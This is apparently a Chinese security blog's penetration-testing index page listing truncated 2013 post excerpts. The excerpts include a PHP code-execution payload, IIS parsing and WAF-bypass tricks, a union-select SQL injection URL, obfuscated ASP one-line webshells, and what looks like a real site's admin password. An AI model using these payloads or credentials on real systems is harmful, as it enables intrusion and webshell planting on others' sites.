渗透

admin 12年前 (2013-08-30) 2013浏览 0评论

简要描述： 非模板，非sql!!!!!!! 详细说明： 后台可以编辑语言项，并且语言项中有部分是双引号，所以可以通过 {${phpinfo()}} 这种格式直接执行php代码，getshell!!(这里为了方便演示，使用phpinfo，实际情况可以换...

admin 12年前 (2013-08-30) 1940浏览 0评论

这几天在做渗透测试的时候，发现一个有趣的东西。目标有上传漏洞，但是无论如何都没法让webshell执行。访问任何jsp文件都跳到登录的地 方，然后尝试过变换jsp的大小写，虽然不跳了，但是直接不解析，利用apache的解析漏洞上传文件，也不解析。后来...

admin 12年前 (2013-08-30) 16104浏览 1评论

简要描述： 随着移动端与PC的渐渐融合，也为了保证用户的可靠性，流量的质量，越来越多的网站实行了一个策略，那就是将手 机验证码发至用户的手机上。在Wooyun常常可以看到这些东西的绕过，以及这些东西的滥用——短信DOS，给用户造成极大的不便，厂商也对...

admin 12年前 (2013-08-30) 1560浏览 0评论

简要描述： 本次测试，将通过VeryCD的自身业务逻辑，结合互联网公开的大数据，对VeryCD进行的一次白帽测试。 # 仅仅是测试行为，为了向大众解释大数据HACK的严重性，未导VeryCD的任何一条数据。 详细说明： #1 介绍概述 先谈一下本文的...

admin 12年前 (2013-08-30) 1759浏览 1评论

本次测试，将通过39健康网的自身业务逻辑，结合互联网公开的大数据，对39健康网的裤子进行一次安全测评。 # 仅仅是测试行为，为了向大众解释大数据HACK的严重性，本人未导39健康网的任何一条数据。 详细说明： #1 开始 大数据的开始，必须先知道下手...

admin 12年前 (2013-08-30) 1810浏览 0评论

起因是这样的，昨天晚上看到优酷上有评测了 今天早晨起床了,要大干一番了。 在一个风和日丽的早晨,我打开了锤子官网 http://www.smartisanos.org/ 主站是wordpress有的搞头,不过我还是要找最薄弱的地方来。 打开了一个旁站...

admin 12年前 (2013-08-29) 1922浏览 0评论

0x1, 惊问某反向代理平台邀请码，一码难求，苦比等了一晚上邀请码无果，大牛们都忙着脱裤，做为一名穷吊丝，只能靠自己的双手解决生理需要了 0x2 工具:破电脑一台，shell一个,反向代理程序1套(或者直接用apahce或者nginx),纸巾若干张，...

admin 12年前 (2013-08-29) 2310浏览 0评论

什么是SAM文件？ 引用自百度百科： SAM是windows系统的一个系统用户账号管理文件。其全称为security account manager Windows中对用户账户的安全管理使用了安全账号 管理器SAM(security acco...

admin 12年前 (2013-08-29) 1757浏览 0评论

x00 什么是域 有人说域是一种组织结构，是个安全边界。域也有另为一个名字，“活动目录”。不管域是什么，它总有一些特点，有了它，对管理一个机构的组织单元，人员，特 别是计算机就方便了许多，特别是计算机，因为域就是建立在计算机上的。加入域里的计算机，共...

admin 12年前 (2013-08-29) 1547浏览 0评论

发表于358 天前 | 作者: seay | 分类: 渗透测试 | 孵化于:2012年09月05日 | 文章热度:1 次 全屏阅读   [+]IIS 6.0 目录解析：/xx.asp/xx.jpg  xx.jpg可替换为任意文本文件(e.g...

admin 12年前 (2013-08-28) 1749浏览 0评论

过安全狗技术总汇 1.过注入 2.过大马被阻拦访问 3.过菜刀连接一句话被拦截 4.过1.asp;.jpg这样的文件 其他我没遇到了。。 现在一点一点讲： 1.过注入 方法一：a.asp?aaa=%00&id=sql语句 方法二： 本帖隐藏...

admin 12年前 (2013-08-28) 2245浏览 2评论

0x00 简介 首先请各位客官看这里:http://viptest.yupage.com 这便是一个使用开源程序7ghost搭建的反向代理演示站。 反向代理，是指反向代理服务器从目标内容服务器上抓取内容返回给用户，反向代理服务器充当了一个中介的功...

admin 12年前 (2013-08-27) 2690浏览 0评论

1、网站登录：用户名admin，口令：sq77221650 http://www.zgsxw88.com/adminlogin.asp 2、网站任意文件下载漏洞就是在”备份数据“的位置。 点击数据库0825下载按钮后的链接为：GET  /bac...

admin 12年前 (2013-08-27) 1984浏览 0评论

8月21日上周三，小编来到北京金台饭店，参加了由互联网安全厂商知道创宇主办的第二届 Web安全论坛Kcon v2，这次会议对外不收取任何费用。值得一提的是，这次Kcon和中国的顶级黑客会议Xcon在同一个酒店，同一个会议厅内，而且提前Xcon一天，大...

admin 12年前 (2013-08-24) 2538浏览 1评论

先看一个注入点： http://www. .cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,concat(database(),0x5c,user(),0x5c,version()),8,...

admin 12年前 (2013-08-24) 2121浏览 1评论

最近乌云社区里有位童鞋发了一个帖子： 说一个域名不知道用了什么手法居然绑定了李毅吧的url，既不是301重定向，也不是域名跳转，也不是域名转发。访问 www.liyiba.com 这个域名感觉李毅吧仿佛单独成立了一个网站一样！而且这个域名的权重居然涨...

admin 12年前 (2013-08-24) 1440浏览 0评论

ps:这篇文章是《支付漏洞的三种常见类型》（http://jinglingshu.org/?p=1804）的一个案例，符合第二种情况：即没有对购买数量进行限制，导致可以将数量修改为负值。   1、首先进入商城，购买任意商品，提交商品数量时抓...

admin 12年前 (2013-08-23) 2590浏览 0评论

在使用xml-rpc的时候，server端获取client数据，主要是通过php输入流input，而不是$_POST数组。所以，这里主要探讨php输入流php://input。 下面的例子摘取的是wordpress中的一段代码，里面有用到http:...

admin 12年前 (2013-08-23) 1770浏览 0评论

1.完整备份一次(保存位置当然可以改) backup database 库名 to disk = ‘c:\ddd.bak’;– 2.创建表并插曲入数据 create table [dbo].[dtest] ([cm...

admin 12年前 (2013-08-23) 2982浏览 0评论

几个变性的asp–过防火墙 过狗效果都不错 1 <%Y=request("x")%> <%execute(Y)%> 1 <%eval (eval(chr(114)+chr(101)+c...